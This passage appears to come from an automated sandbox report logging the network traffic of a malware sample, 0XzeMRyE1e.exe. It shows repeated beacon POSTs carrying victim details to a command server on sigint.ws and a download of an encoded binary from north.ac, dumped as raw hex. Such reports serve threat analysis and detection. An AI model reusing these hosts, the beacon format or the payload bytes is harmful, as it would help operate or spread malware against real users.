                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:55.354124069 CEST | 3487 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              98 | 192.168.2.4 | 49872 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:55.595479965 CEST | 3488 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:55.778655052 CEST | 3488 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              99 | 192.168.2.4 | 49873 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:56.035907030 CEST | 3489 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:56.215048075 CEST | 3489 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              0 | 192.168.2.4 | 49759 | 172.67.152.230 | 443 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              2022-06-01 23:53:22 UTC | 0 | OUT | GET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
                                                                              2022-06-01 23:53:22 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 01 Jun 2022 23:53:22 GMT
                                                                              Content-Length: 194560
                                                                              Connection: close
                                                                              Last-Modified: Thu, 26 May 2022 04:23:16 GMT
                                                                              Accept-Ranges: bytes
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AP7Zg752WNfeUzVi%2Bw%2Fa4FXF9QJtkG86GVh%2BgoVTaw%2BM2SfcxdTfadMSedXfmVHDgRLvDW7nXQ%2BPWEE9Sk%2FOFSWrM%2FEMSYR7mJQ34AH4bfAyj%2FOR87A14scFTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bde48eeea71ae-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Data Ascii: PZPvCPZPvCPPv^vvo vC vvvo a ,vE$vDg%"000000e!($jHhxAjgvhxB
                                                                              2022-06-01 23:53:22 UTC17INData Raw: 23 f0 f8 32 17 6e 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 6f 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 70 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 71 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 72 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 73 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 74 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 75 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 76 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 77 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 3e 18 78 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 79 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7a f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7b f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7c f8 f8 f8 14 25 fa 1e 22 20
                                                                              Data Ascii: #2n%" #2o%" #2p%" #2q%" #2r%" #2s%" #2t%" #2u%" #2v%" #2w%" #>x%" #>y%" #>z%" #>{%" #>|%"
                                                                              2022-06-01 23:53:22 UTC19INData Raw: ae 37 b3 46 49 de f9 5a 6b db b6 a5 51 55 31 75 b9 e6 f5 5f 99 a4 3e bc 49 20 f0 65 47 9e 19 b9 da 18 49 8f e5 83 3f 6d 69 18 04 ea 1d d8 b5 e3 a9 04 12 47 c2 81 5f c6 03 18 a3 d3 7b 9e 76 63 cf 0a 76 a5 18 70 bb 59 61 27 ad 5c 8a 44 36 ce 52 7d 78 44 57 6b f3 67 e9 30 c7 5e fc 49 2d bf b1 19 61 47 5e 71 c9 bf 9a a4 2a f3 a3 b7 7c f6 6f b1 80 c6 3a 98 08 fd 4e 64 59 be c2 95 35 f8 8c 15 6f 6c 09 3d fa bd b0 10 18 39 2d fd 20 91 52 f0 a7 8b b4 e9 df 86 b8 65 48 a6 9b 41 a4 d6 f8 5e 02 f5 81 1b 6f 65 e5 99 c1 92 3e bc a7 14 56 81 d5 d2 a4 b1 75 7d c3 cf af ee 19 85 8e 5b d8 2f 6f 7d ab 6c eb 4c 16 71 f9 96 30 f0 f3 e7 36 d3 1d a8 8f f5 1f a4 fd d9 b3 1c 24 e0 f3 12 e9 c1 5d 8e ea 4a 13 f9 86 4a 55 47 13 aa 62 3e f9 63 ff d5 d9 40 80 3f 03 c6 71 8a 28 c0 df
                                                                              Data Ascii: 7FIZkQU1u_>I eGI?miG_{vcvpYa'\D6R}xDWkg0^I-aG^q*|o:NdY5ol=9- ReHA^oe>Vu}[/o}lLq06$]JJUGb>c@?q(
                                                                              2022-06-01 23:53:22 UTC20INData Raw: cb 5a ac 96 03 de 37 5d 9e b6 5f 83 8c c7 36 33 91 4d 6a 37 51 9e 97 db d8 51 d7 e3 72 67 2d c2 7d a2 55 a6 c5 b4 eb d0 fb 59 5c 04 e2 c0 72 a1 aa a0 7b 8e 1d 75 4f ff e0 d4 e3 3a 42 74 d8 1f ce b0 85 67 a7 85 53 55 93 67 a0 02 05 7f 43 66 e5 e9 0a b1 8b 86 37 a9 89 5c bf 90 a1 4e 3f c9 fc 69 33 a1 29 e4 a9 7e 54 58 58 37 6a 12 be c1 0f e8 f6 a5 15 c9 12 80 aa b1 9f 04 8f 86 5c 93 b9 af 40 36 09 6e 81 49 73 ae 75 c6 80 4b 3b e3 32 06 7b 03 31 64 e0 d6 c4 cc ab 76 6e c2 38 92 1f 2f ad cd e6 5a 47 7d 02 4a 92 c2 62 86 21 04 9b fe 4c 5f 2e 6b 7a 72 22 3c 94 b7 7c e4 78 ab c1 ee f9 c4 94 9b 8b 46 22 3c 99 ab ad 33 52 f8 30 32 db 28 a2 3a 77 fe 9b 48 a1 ee ac db 8a f8 dd fa 1d 6e c2 7e a5 8f cf 70 0c 25 9b 26 51 4d 47 66 48 89 b6 2f 78 94 ef be b1 6f 3a e9 b0
                                                                              Data Ascii: Z7]_63Mj7QQrg-}UY\r{uO:BtgSUgCf7\N?i3)~TXX7j\@6nIsuK;2{1dvn8/ZG}Jb!L_.kzr"<|xF"<3R02(:wHn~p%&QMGfH/xo:
                                                                              2022-06-01 23:53:22 UTC21INData Raw: 87 ae ba f9 49 94 0d 42 88 f6 a1 f9 0d 81 fb 85 9d 5d 3f 9e 0e b3 5b e8 65 ec b5 6b ee 51 d4 f5 11 28 a6 92 23 75 a5 b2 c1 e3 6b 57 b2 27 86 9e 96 5a 7f d2 0e e7 37 bd 14 1e 67 c2 65 ae dc 36 8d 26 6d 55 41 bb 48 06 b3 f2 b3 c6 3e 76 e4 70 df df 4b c1 8d 68 e7 37 d3 da ed d8 c1 4f 5b 0f 58 ad d3 15 19 c0 3b bb db e9 b0 95 0b af 8a 13 30 88 2e ef 05 a6 5d 5e 5d 80 82 3d 63 1a f0 72 9e 10 71 b6 29 3e 22 c0 52 c6 2e 63 bb 15 cb 80 a7 d8 3b c2 6b d4 65 0c a7 86 ff 4c 10 f6 12 27 b5 d1 9b a8 76 95 9e ac 1b 34 d6 f6 4b 36 3b 06 8c 91 62 fb 22 6d 9f d3 ce 67 20 5d 59 fe 3c 45 6a 43 23 b0 af bf 76 83 2b 9e 35 59 3e 28 d0 37 63 62 51 fd af 3d ee bb a4 d0 a9 aa 2c f0 c7 e3 fb a8 3a 3f 65 9b d9 4d ee 18 9c 31 aa 38 ef 79 bf 36 83 ed c7 71 7b 70 7a 11 16 44 2e 28 1c
                                                                              Data Ascii: IB]?[ekQ(#ukW'Z7ge6&mUAH>vpKh7O[X;0.]^]=crq)>"R.c;keL'v4K6;b"mg ]Y<EjC#v+5Y>(7cbQ=,:?eM18y6q{pzD.(
                                                                              2022-06-01 23:53:22 UTC23INData Raw: c0 0a e6 71 40 5e 90 90 d8 5b a8 9a 78 b9 99 85 a3 87 40 ec 1d dc ad 0c ce 0a 56 d9 2d 99 de c7 54 1c ab cf 8c b4 35 cf 1b ca cc 6f 38 d9 50 4b 4d ac bc 13 1f 7a 32 ac b3 d5 1d ee 4e 84 19 a4 22 25 89 78 8d 39 3b b4 47 cd e3 63 bc 6a 5d 7a 39 56 fc 2f 0f 3c 74 b1 bc fb b1 34 0d 04 f4 61 bc 7a c2 69 81 5a 87 bb 35 0d d3 e4 73 d7 c1 3e bc 0f 5f 84 79 e1 83 81 19 db 67 b8 0a 4d 2d 91 30 1f 90 24 28 0f ac a2 81 70 fd 33 ae 30 ee 54 3e e9 f2 b6 d7 fc 00 09 fe bd 2e e0 10 c6 08 22 a1 b5 1c 36 6b 2e e5 11 1c 7b 28 03 d6 5f f3 56 d9 27 ff f1 06 72 30 39 0a 11 e2 7c 7b da 8d dc 69 59 f2 ff cd 6e 6d 41 55 58 31 91 cc 23 68 6c 0c 4f 91 1b 03 1f 19 0e e0 2a b8 3d 54 30 ac 53 14 f1 3e 3f 90 db 96 66 8d 1c d0 ca f9 d4 05 a9 49 8f e1 03 b1 1e f4 11 7e a5 03 4f 81 b9 4b
                                                                              Data Ascii: q@^[x@V-T5o8PKMz2N"%x9;Gcj]z9V/<t4aziZ5s>_ygM-0$(p30T>."6k.{(_V'r09|{iYnmAUX1#hlO*=T0S>?fI~OK
                                                                              2022-06-01 23:53:22 UTC24INData Raw: cb 6a 3b cb b5 42 e9 27 ec 41 ca 0b 99 70 be 06 d1 78 f9 85 ef a1 43 21 6a 58 ae 04 fb e7 35 7f 79 4a ed 0a 80 33 39 a8 14 d6 43 1a 68 8e 48 53 5c a2 da 77 f6 93 11 a8 20 eb 57 d7 68 74 cf c3 40 1e 62 48 03 47 94 a9 0e 9d 2f 9a 01 fe b9 ff f4 de 20 2b 9b c4 c1 d2 42 a5 28 fa 87 2a ff 8d 01 39 da 11 33 49 2e d9 4b a0 4f f7 e5 2a 0b c8 9c b0 db 4b 6a 68 43 82 d4 a2 8f 20 08 23 11 d0 ad bc 73 a9 7c 1f be b8 5f 76 66 bd 14 00 90 18 40 69 a8 76 2d cc b2 2f b1 43 81 cc bb c4 5e a6 b4 30 df 6b 71 8b bf 08 be c7 61 f0 f6 3e 62 ce d1 b0 c3 9e 05 7b 58 e9 3d af 88 57 08 b6 9c 8f fb 95 20 db 9f 00 da df 6f 82 90 cf 05 4d 75 cf a2 32 e1 26 d8 ae f0 30 85 0b 79 07 87 4f 79 03 63 a0 63 d7 57 5f db 42 6e 5f 76 ae 28 c4 5b 5f 08 e4 fd 2b d5 1b d4 43 f8 40 fe ba ef 73 55
                                                                              Data Ascii: j;B'ApxC!jX5yJ39ChHS\w Wht@bHG/ +B(*93I.KO*KjhC #s|_vf@iv-/C^0kqa>b{X=W oMu2&0yOyccW_Bn_v([_+C@sU
                                                                              2022-06-01 23:53:22 UTC25INData Raw: b6 d9 c0 0f f1 c0 a7 3a de f3 07 d4 08 61 7b 06 72 2f 2f 61 67 c5 35 9b ba 72 af a2 69 95 50 ed 9f 28 c9 7c 59 66 ff 46 09 7b 89 6e 88 a7 95 1f 32 16 21 9c 1d 15 f3 91 a0 04 cd 4f 19 ae d6 eb fb 9d 3b ec 58 76 0f 67 5e e9 b9 dd fe fb 40 88 8d 0d bc 0d 05 79 db 02 3c 71 80 ac da 06 a1 25 c3 14 08 70 ee ec 1b 2a 50 a7 ac 2c 84 19 fe 63 b3 9a f5 2c 38 25 0d 4a 86 0c 22 4b 87 93 c6 54 50 33 db b7 17 35 0c 02 32 c5 aa 6c eb d8 a7 4e 03 6d 45 d0 4a 17 71 4f 1d eb 71 44 94 e7 91 c8 cd f0 7b a3 ea db 05 9a e5 58 27 bd 27 2d 76 65 61 ce ac ca d9 07 5b ba e5 21 ab d1 3a 00 c1 60 73 1d 90 04 ca cc 83 cd d1 01 6a 08 dd 4f a7 70 ce b4 a9 fe 1c 86 73 79 4d 71 ad ee f6 e7 11 95 2c 74 89 14 c5 90 0d bf 38 d2 b2 e5 d7 2f 64 9b 93 d1 67 54 fe 5a ae 82 46 8e 89 57 3c c5 a8
                                                                              Data Ascii: :a{r//ag5riP(|YfF{n2!O;Xvg^@y<q%p*P,c,8%J"KTP352lNmEJqOqD{X''-vea[!:`sjOpsyMq,t8/dgTZFW<
                                                                              2022-06-01 23:53:22 UTC26INData Raw: 0f 38 83 97 ad 7b 18 be 18 27 5b 18 6c 61 65 5d 67 6d 6c 18 2d 18 1e 1e 18 65 67 6e 5d 6e 6b 6b 5d 6a 6e 59 2a 5f 6d 59 6a 5c a4 b6 ac 59 a6 c4 9c ca c0 c6 37 20 82 8d 3f 51 fa fe c6 b9 5b be 59 0f fb 34 ed 81 4e 87 84 a2 17 fb e0 5e 99 32 0f fb 50 ff 6c d5 70 15 1e b5 05 7b 34 98 02 6f bb 19 43 10 15 c8 df af e3 0c 38 42 78 b2 04 25 76 90 53 f9 c2 09 c4 a8 56 75 20 25 43 34 d6 4b ea 38 8f 90 6b db 81 95 fb ad 01 74 30 96 93 62 a8 d6 fc 9a 3c 01 a4 aa 4b 92 b1 97 9f b2 63 a7 2d e4 4e 38 1a 6b b0 92 07 b4 f5 0c ff 47 6f b6 d8 b5 73 64 2f 33 06 e1 8b dc 3c d0 21 e0 ed 3f 41 51 3e 42 3f 53 40 35 1d 61 8b 7f 03 8f a3 fb 1b f1 b5 e1 37 f6 6f f1 d6 64 a4 35 27 d7 68 1d be ad c1 a5 01 24 6f 7d 6d 35 3e c5 9f 7e d5 f2 31 38 ad 27 23 03 00 42 d8 44 63 d2 a5 02 06
                                                                              Data Ascii: 8{'[lae]gml-egn]nkk]jnY*_mYj\Y7 ?Q[Y4N^2Plp{4oC8Bx%vSVu %C4K8kt0b<Kc-N8kGosd/3<!?AQ>B?S@5a7od5'h$o}m5>~18'#BDc
                                                                              2022-06-01 23:53:22 UTC28INData Raw: f8 00 f8 f8 f8 fc f8 f8 f8 0a f8 f8 f8 f9 f8 f8 f8 ff f8 f8 f8 f9 f8 f8 f8 0e f8 f8 f8 f9 f8 f8 f8 02 f8 f8 f8 f8 f8 f9 f8 f9 f8 f8 f8 f8 f8 fe f8 15 f8 1c f8 fe f8 31 f8 1c f8 02 f8 7b f8 66 f8 fe f8 c4 fa 1c f8 fe f8 01 fb 1c f8 fe f8 68 fc 71 fc 06 f8 17 fe 25 fe fe f8 38 fe 48 fe fe f8 59 fe 65 fe fe f8 7a fe 1c f8 fe f8 87 fe 94 fe fe f8 af fe be fe fe f8 ee fe 1c f8 fe f8 f4 fe 1c f8 fe f8 07 ff 1c f8 06 f8 1c ff 25 fe fe f8 3b ff 1c f8 fe f8 50 ff 57 ff fe f8 72 ff 1c f8 fe f8 81 ff 8a ff fe f8 a7 ff 1c f8 fe f8 b9 ff 8a ff fe f8 c7 ff 8a ff fe f8 e2 ff e7 ff fe f8 f8 00 e7 ff fe f8 1d 00 1c f8 06 f8 36 00 25 fe 06 f8 78 00 25 fe fe f8 9b 00 a3 00 fe f8 d9 00 1c f8 fe f8 09 01 1c f8 fe f8 a0 01 e7 ff 0a f8 58 fb c0 01 fe f8 ef 01 1c f8 83 f8 09 02
                                                                              Data Ascii: 1{fhq%8HYez%;PWr6%x%X
                                                                              2022-06-01 23:53:22 UTC29INData Raw: f8 f8 fd fb f8 f8 09 f8 3a f8 8b f8 0b f9 f8 f8 ff fb f8 f8 09 f8 3a f8 8b f8 f8 f9 f8 f8 2b f8 25 f8 fd f8 3a f8 8b f8 08 f9 f8 f8 e1 f8 e1 f8 09 f8 3c f8 8b f8 f8 f9 f8 f8 29 f8 29 f8 fd f8 3c f8 8b f8 08 f9 f8 f8 e1 f8 23 f8 09 f8 3e f8 8b f8 f8 f9 08 f8 23 f8 29 f8 0d f8 3e f8 8b f8 f8 f8 08 f8 29 f8 af f8 0d f8 3e f8 8c f8 f8 f8 08 f8 29 f8 e5 fa 0d f8 3e f8 8d f8 f8 f8 08 f8 2b f8 23 f8 0d f8 3e f8 8e f8 f8 f8 08 f8 e5 fa 23 f8 0d f8 3e f8 8f f8 f8 f8 08 f8 e1 f8 29 f8 0d f8 3e f8 90 f8 f9 f9 f8 f8 0b fb 15 fb 01 f8 3e f8 91 f8 79 f9 f8 f8 2d fb 3d fb fd f8 3e f8 95 f8 79 f9 08 f8 58 fb 3d fb fd f8 40 f8 97 f8 f8 f9 f8 f8 23 f8 23 f8 fd f8 40 f8 98 f8 0b f9 f8 f8 23 f8 f8 f8 09 f8 41 f8 98 f8 f8 f8 f8 f8 2b f8 2b f8 fd f8 41 f8 98 f8 f8 f9 08 f8 e5
                                                                              Data Ascii: ::+%:<))<#>#)>)>)>+#>#>)>>y-=>yX=@##@#A++A
                                                                              2022-06-01 23:53:22 UTC30INData Raw: f9 f8 f9 f8 f8 40 fc f8 f8 01 f8 d7 f8 85 f9 f8 f9 f8 f8 43 fc f8 f8 01 f8 d8 f8 88 f9 f8 f9 f8 f8 46 fc f8 f8 01 f8 d9 f8 8b f9 f8 f9 f8 f8 49 fc f8 f8 01 f8 da f8 8e f9 f8 f9 f8 f8 4c fc f8 f8 01 f8 dc f8 91 f9 f8 f9 f8 f8 4f fc f8 f8 01 f8 de f8 94 f9 f8 f9 f8 f8 52 fc f8 f8 01 f8 e0 f8 97 f9 f8 f9 f8 f8 55 fc f8 f8 01 f8 e2 f8 9a f9 f8 f9 f8 f8 58 fc f8 f8 01 f8 e4 f8 9d f9 f8 f9 f8 f8 5c fc f8 f8 01 f8 e5 f8 a0 f9 f8 f9 f8 f8 60 fc f8 f8 01 f8 e7 f8 a3 f9 f8 f9 f8 f8 64 fc f8 f8 01 f8 e8 f8 a6 f9 0e f8 23 f8 02 f8 0e f8 23 f8 06 f8 0e f8 7d fc 06 f8 0e f8 7d fc 09 f8 0e f8 81 fc 06 f8 0e f8 8c fc 06 f8 0e f8 99 fc 06 f8 0e f8 a6 fc 0c f8 0e f8 b1 fc 10 f8 0e f8 bc fc 10 f8 0e f8 c9 fc 10 f8 0e f8 d5 fc 13 f8 0e f8 e2 fc 0c f8 0e f8 f0 fc 09 f8 0e f8
                                                                              Data Ascii: @CFILORUX\`d##}}
                                                                              2022-06-01 23:53:22 UTC31INData Raw: bd 03 9b fa 0b f8 10 fc a6 fa 0b f8 13 fc a6 fa 0b f8 16 fc b2 fa 0b f8 19 fc bb fa 0b f8 e4 03 bb fa 0b f8 1c fc bb fa 0b f8 e8 03 bb fa 0b f8 1f fc c5 fa 0b f8 22 fc c5 fa 0b f8 25 fc d0 fa 0b f8 07 04 d0 fa 0b f8 28 fc da fa 0b f8 2b fc e4 fa 0b f8 1e 04 e4 fa 0b f8 2e fc ee fa 0b f8 2f 04 ee fa 0b f8 31 fc ee fa 0b f8 45 04 ee fa 0b f8 34 fc ee fa 0b f8 56 04 ee fa 0b f8 37 fc fa fb 0b f8 98 04 fa fb 0b f8 3a fc 06 fb 0b f8 bc 04 06 fb 0b f8 3d fc 11 fb 0b f8 40 fc 1c fb 0b f8 43 fc 26 fb 0b f8 46 fc 26 fb 0b f8 49 fc 26 fb 0b f8 4c fc 30 fb 0b f8 00 05 30 fb 0b f8 4f fc 3a fb 0b f8 52 fc 43 fb 0b f8 55 fc 43 fb 0b f8 58 fc 43 fb 0b f8 5c fc 4e fb 0b f8 61 05 4e fb 0b f8 60 fc 59 fb 0b f8 66 05 59 fb 0b f8 64 fc 65 fb 0b f8 80 05 71 fb 0b f8 84 05 7c
                                                                              Data Ascii: "%(+./1E4V7:=@C&F&I&L00O:RCUCXC\NaN`YfYdeq|
                                                                              2022-06-01 23:53:22 UTC33INData Raw: f8 38 3c f8 f8 f8 f8 8e f8 54 09 5e fb 22 f8 5c 3c f8 f8 f8 f8 8e f8 78 09 6a fb 24 f8 80 3c f8 f8 f8 f8 8e f8 9d 09 76 fb 26 f8 a0 3c f8 f8 f8 f8 8e f8 0f fe 4a fd 27 f8 20 3d f8 f8 f8 f8 8e f8 b7 09 52 fd 27 f8 90 3d f8 f8 f8 f8 8e f8 12 fd a2 fc 29 f8 dc 3d f8 f8 f8 f8 89 f8 23 f8 59 fd 29 f8 78 42 f8 f8 f8 f8 8e f8 0b fe a2 fc 29 f8 c0 42 f8 f8 f8 f8 8e f8 4a f8 a2 fc 29 f8 0c 43 f8 f8 f8 f8 8e f8 13 fe a2 fc 29 f8 f8 f8 f8 f8 78 f8 8e 58 da 09 62 fd 29 f8 58 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 2b f8 60 43 f8 f8 f8 f8 89 10 02 07 a2 fc 2b f8 f8 f8 f8 f8 fb f8 7e 10 0c 07 e4 fc 2b f8 f8 f8 f8 f8 fb f8 be f9 d2 ff 69 fd 2d f8 f8 f8 f8 f8 fb f8 be f9 51 07 70 fd 2f f8 f8 f8 f8 f8 fb f8 be f9 81 07 7d fd 33 f8 e8 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 34 f8 f0 43
                                                                              Data Ascii: 8<T^"\<xj$<v&<J' =R'=)=#Y)xB)BJ)C)xXb)XC~+`C+~+i-Qp/}3C~4C
                                                                              2022-06-01 23:53:22 UTC34INData Raw: 97 fa af f8 68 56 f8 f8 f8 f8 7e 10 0c 07 97 fa af f8 70 56 f8 f8 f8 f8 fe 10 0c 07 42 f9 af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff dc fe af f8 78 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e4 fe af f8 88 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e9 fe af f8 98 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ef fe af f8 a8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff f4 fe af f8 b8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af
                                                                              Data Ascii: hV~pVB>xV>V>V>V>V
                                                                              2022-06-01 23:53:22 UTC36INData Raw: 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 96 ff af f8 78 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 9d ff af f8 88 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff a4 ff af f8 98 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ab ff af f8 a8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 70 ff af f8 b8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff b2 ff af f8 c8 58 f8 f8 f8 f8 08 10 02 07
                                                                              Data Ascii: >xX>X>X>X>pX>X
                                                                              2022-06-01 23:53:22 UTC37INData Raw: fb f8 3e f8 d2 ff 4f 00 af f8 80 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 55 00 af f8 94 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 5a 00 af f8 a8 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 60 00 af f8 bc 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 66 00 af f8 d0 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff c3 f8 af f8 e4 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e
                                                                              Data Ascii: >OZ>UZ>ZZ>`Z>fZ>Z>
